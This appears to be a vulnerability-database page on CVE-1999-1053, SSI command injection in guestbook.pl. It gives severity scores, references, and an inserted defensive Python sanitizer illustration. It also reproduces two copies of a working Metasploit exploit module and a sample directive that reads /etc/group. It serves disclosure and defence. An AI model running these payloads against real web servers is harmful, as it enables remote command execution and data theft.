CVE-1999-1053
CVSS7.5
Published: 1999-09-13 00:00:00
Last modified: 2008-09-05 16:18:36

[Original] guestbook.pl cleanses user-inserted SSI commands by removing text between "<!--" and "-->" separators, which allows remote attackers to execute arbitrary commands when guestbook.pl is run on Apache 1.3.9 and possibly other versions, since Apache allows other closing sequences besides "-->".


[CNNVD] Matt Wright GuestBook Remote Arbitrary Command Execution Vulnerability (CNNVD-199909-026)

GuestBook is a widely used web-based CGI guestbook program written by Matt Wright.
GuestBook's implementation has an input validation vulnerability; a remote attacker could exploit it to execute arbitrary system commands on the host with the privileges of the web process.
The problem is that some versions of the guestbook.pl script allow users to enter SSI directives without filtering user input carefully, which lets an attacker execute arbitrary commands on the host with the privileges of the httpd process.

- CVSS (base score)

CVSS score: 7.5 [HIGH]
Confidentiality impact: PARTIAL [likely to cause information disclosure]
Integrity impact: PARTIAL [may lead to modification of system files]
Availability impact: PARTIAL [may lead to degraded performance or interrupted access to resources]
Access complexity: LOW [no access restrictions on exploitation]
Access vector: [--]
Authentication: NONE [no authentication required to exploit]

- CPE (affected platforms and products)

cpe:/a:matt_wright:matt_wright_guestbook:2.3
cpe:/a:apache:http_server:1.3.9
Apache Software Foundation Apache HTTP Server 1.3.9

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1053
(Official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-1999-1053
(Official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-199909-026
(Official data source) CNNVD

- Other links and resources

http://www.securityfocus.com/bid/776
(VENDOR_ADVISORY)  BID  776
http://www.securityfocus.com/archive/82/27560
(VENDOR_ADVISORY)  VULN-DEV  19990916 Re: Guestbook perl script (error fix)
http://www.securityfocus.com/archive/82/27296
(VENDOR_ADVISORY)  VULN-DEV  19990913 Guestbook perl script (long)
http://www.securityfocus.com/archive/1/33674
(VENDOR_ADVISORY)  BUGTRAQ  19991105 Guestbook.pl, sloppy SSI handling in Apache? (VD#2)

- Vulnerability information

Matt Wright GuestBook Remote Arbitrary Command Execution Vulnerability
High risk  Input validation
1999-09-13 00:00:00 2007-02-08 00:00:00
Remote

GuestBook is a widely used web-based CGI guestbook program written by Matt Wright.
GuestBook's implementation has an input validation vulnerability; a remote attacker could exploit it to execute arbitrary system commands on the host with the privileges of the web process.
The problem is that some versions of the guestbook.pl script allow users to enter SSI directives without filtering user input carefully, which lets an attacker execute arbitrary commands on the host with the privileges of the httpd process.

- Advisories and patches

Temporary workaround:
If you cannot install a patch or upgrade immediately, CNNVD recommends the following measures to reduce the threat:
* Stop using the software until the vulnerability is patched.
Vendor patch:
Matt Wright
-----------
The author has fixed this security vulnerability in the latest version of the software; download it from the author's home page:

http://www.worldwidemart.com/scripts/readme/guestbook.shtml

- Vulnerability information (16914)

Matt Wright guestbook.pl Arbitrary Command Execution (EDBID:16914)
cgi webapps
2010-07-03 Verified
0 metasploit
N/A
##
# $Id: guestbook_ssi_exec.rb 9671 2010-07-03 06:21:31Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote
	Rank = ExcellentRanking

	include Msf::Exploit::Remote::HttpClient

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Matt Wright guestbook.pl Arbitrary Command Execution',
			'Description'    => %q{
				The Matt Wright guestbook.pl <= v2.3.1 CGI script contains
				a flaw that may allow arbitrary command execution. The vulnerability
				requires that HTML posting is enabled in the guestbook.pl script, and
				that the web server must have the Server-Side Include (SSI) script
				handler enabled for the '.html' file type. By combining the script
				weakness with non-default server configuration, it is possible to exploit
				this vulnerability successfully.
			},
			'Author'         => [ 'patrick' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 9671 $',
			'References'     =>
				[
					[ 'CVE', '1999-1053' ],
					[ 'OSVDB', '84' ],
					[ 'BID', '776' ],
				],
			'Privileged'     => false,
			'Payload'        =>
				{
					'DisableNops' => true,
					'Space'       => 1024,
					'Compat'      =>
						{
							'PayloadType' => 'cmd',
							'RequiredCmd' => 'generic perl ruby bash telnet',
						}
				},
			'Platform'       => [ 'unix', 'win', 'linux' ],
			'Arch'           => ARCH_CMD,
			'Targets'        => [[ 'Automatic', { }]],
			'DisclosureDate' => 'Nov 05 1999',
			'DefaultTarget'  => 0))

			register_options(
				[
					OptString.new('URI', [true, "guestbook.pl script path", "/cgi-bin/guestbook.pl"]),
					OptString.new('URIOUT', [true, "guestbook.html output", "/guestbook/guestbook.html"]),
				], self.class)
	end

	def exploit
		realname	= rand_text_alphanumeric(20)
		email		= rand_text_alphanumeric(20)
		city		= rand_text_alphanumeric(20)
		state		= rand_text_alphanumeric(20)
		country 	= rand_text_alphanumeric(20)

		sploit = Rex::Text.uri_encode("<!--#exec cmd=\"" + payload.encoded.gsub('"','\"') + "\"", 'hex-normal')

		req1 = send_request_cgi({
			'uri'     => datastore['URI'],
			'method'  => 'POST',
			'data'    => "realname=#{realname}&username=#{email}&city=#{city}&state=#{state}&country=#{country}&comments=#{sploit}",
		}, 25)

		req2 = send_request_raw({
			'uri'     => datastore['URIOUT'],
		}, 25)

	end
end
		

- Vulnerability information (F82359)

Matt Wright guestbook.pl Arbitrary Command Execution (PacketStormID:F82359)
2009-10-30 00:00:00
patrick  metasploit.com
exploit,web,arbitrary,cgi
CVE-1999-1053

The Matt Wright guestbook.pl versions 2.3.1 and below CGI script contains a flaw that may allow arbitrary command execution. The vulnerability requires that HTML posting is enabled in the guestbook.pl script, and that the web server must have the Server-Side Include (SSI) script handler enabled for the '.html' file type. By combining the script weakness with non-default server configuration, it is possible to exploit this vulnerability successfully.

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::HttpClient

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Matt Wright guestbook.pl Arbitrary Command Execution',
			'Description'    => %q{
				The Matt Wright guestbook.pl <= v2.3.1 CGI script contains
				a flaw that may allow arbitrary command execution. The vulnerability
				requires that HTML posting is enabled in the guestbook.pl script, and
				that the web server must have the Server-Side Include (SSI) script
				handler enabled for the '.html' file type. By combining the script
				weakness with non-default server configuration, it is possible to exploit
				this vulnerability successfully.
			},
			'Author'         => [ 'patrick' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision$',
			'References'     =>
				[
					[ 'CVE', '1999-1053' ],
					[ 'OSVDB', '84' ],
					[ 'BID', '776' ],
				],
			'Privileged'     => false,
			'Payload'        =>
				{
					'DisableNops' => true,
					'Space'       => 1024,
					'Compat'      =>
						{
							'PayloadType' => 'cmd',
							'RequiredCmd' => 'generic perl ruby bash telnet',
						}
				},		
			'Platform'       => [ 'unix', 'win', 'linux' ],
			'Arch'           => ARCH_CMD,
			'Targets'        => [[ 'Automatic', { }]],
			'DisclosureDate' => 'Nov 05 1999',
			'DefaultTarget'  => 0))

			register_options(
				[
					OptString.new('URI', [true, "guestbook.pl script path", "/cgi-bin/guestbook.pl"]),
					OptString.new('URIOUT', [true, "guestbook.html output", "/guestbook/guestbook.html"]),
				], self.class)
	end

	def exploit
		realname	= rand_text_alphanumeric(20)
		email		= rand_text_alphanumeric(20)
		city		= rand_text_alphanumeric(20)
		state		= rand_text_alphanumeric(20)
		country		= rand_text_alphanumeric(20)

		sploit = Rex::Text.uri_encode("<!--#exec cmd=\"" + payload.encoded.gsub('"','\"') + "\"", 'hex-normal')

		req1 = send_request_cgi({
			'uri'     => datastore['URI'],
			'method'  => 'POST',
			'data'    => "realname=#{realname}&username=#{email}&city=#{city}&state=#{state}&country=#{country}&comments=#{sploit}",
		}, 25)

		req2 = send_request_raw({
			'uri'     => datastore['URIOUT'],
		}, 25)
		
	end
end

    

- Vulnerability information

84
Matt Wright guestbook.pl Arbitrary Command Execution
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public

- Vulnerability description

guestbook.pl contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is triggered when the Guestbook option is enabled that allows HTML posting and the Web server has SSI (Server-Side Include) enabled for .html files. It is possible that the flaw may allow a remote attacker to insert SSI code in guestbook messages and execute arbitrary commands with the privileges of the Web server resulting in a loss of integrity.

- Timeline

1999-11-05 Unknown
1999-11-05 Unknown

- Solution

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

- References

- Author

- Vulnerability information

Guestbook CGI Remote Command Execution Vulnerability
Input Validation Error (BID 776)
Remote: Yes  Local: No
Published: 1999-11-05 12:00:00  Updated: 2009-07-11 12:56:00
This was discussed on the Vuln-Dev mailing list hosted by Security Focus in a thread starting on September 13, 1999. It was posted to BugTraq by Blue Boar <BlueBoar@thievco.com> on Nov 5, 1999.

- Affected program versions

Matt Wright GuestBook 2.3

- Discussion

When Guestbook is configured to allow HTML posts and the web server has server-side includes enabled for HTML files, an attacker may be able to embed SSI (server-side include) directives in guestbook messages. Server-side includes allow remote command execution, including the display of any file the web server has read access to (see the example):


<!--#exec cmd="cat /etc/group"

In an attempt to stop this from happening, guestbook.pl parses for SSI commands under the assumption that they are in this format:

<-- SSI command -->
                ^^ Does not need to be there.

Apache will accept different formats, which evade the regular expression in guestbook.pl, so the commands execute on the target host just as they would if the page author had placed them there.
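The following Python snippet is an added illustration; it is not part of this advisory, of the CNNVD summary above, or of guestbook.pl. It models the weakness both descriptions point at: a sanitizer that only removes text bracketed by "<!--" and "-->" (an assumption that mirrors the described behaviour; the actual regular expression in guestbook.pl is not reproduced here) lets a directive that lacks the expected closer through untouched, whereas a sanitizer that encodes every angle bracket leaves nothing for mod_include to parse. The sample comments and all function names are constructed for the example.

```python
import html
import re

# Constructed sample guestbook comments (not taken from the advisory).
SAMPLES = {
    "well_formed": '<!--#exec cmd="id" -->',   # carries the '-->' the filter expects
    "no_closer": '<!--#exec cmd="id"',         # no closer, as in the advisory's example
    "benign": "Nice site! 1 < 2 and 3 > 2",     # ordinary text with angle brackets
}

# Assumed model of the guestbook.pl filter: drop whatever sits between
# "<!--" and "-->". A directive without "-->" never matches.
NAIVE_SSI_RE = re.compile(r"<!--.*?-->", re.DOTALL)


def naive_strip_ssi(comment: str) -> str:
    """Closer-dependent filter: only removes directives that end in '-->'."""
    return NAIVE_SSI_RE.sub("", comment)


# Apache's mod_include recognises a directive by the "<!--#" opening
# sequence, so a detection check should key on the opener, not the closer.
SSI_OPEN_RE = re.compile(r"<!--#")


def contains_ssi_directive(text: str) -> bool:
    """Detection check: is an SSI directive opener still present?"""
    return SSI_OPEN_RE.search(text) is not None


def hardened_sanitize(comment: str) -> str:
    """Encode '<', '>', '&' and quotes so no markup, and therefore no SSI
    directive, can survive into the generated guestbook page."""
    return html.escape(comment, quote=True)


def audit(comment: str) -> dict:
    """Run both sanitizers over one comment and report whether a directive
    opener survives each of them."""
    naive = naive_strip_ssi(comment)
    hardened = hardened_sanitize(comment)
    return {
        "naive_output": naive,
        "naive_leaks_directive": contains_ssi_directive(naive),
        "hardened_output": hardened,
        "hardened_leaks_directive": contains_ssi_directive(hardened),
    }


if __name__ == "__main__":
    for name, comment in SAMPLES.items():
        print(name, audit(comment))
```

Keying the check on the `<!--#` opener rather than on a closing sequence matches how mod_include decides that a directive starts, which is the property the closer-based filter gets wrong. On the server side, `Options IncludesNOEXEC` disables `#exec` in SSI-parsed documents, and not mapping the `server-parsed` handler onto `.html` removes the non-default configuration the exploit modules on this page require.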

- Exploit

See discussion.

- Solution

A temporary solution is to disable server-side includes in Apache.

- References
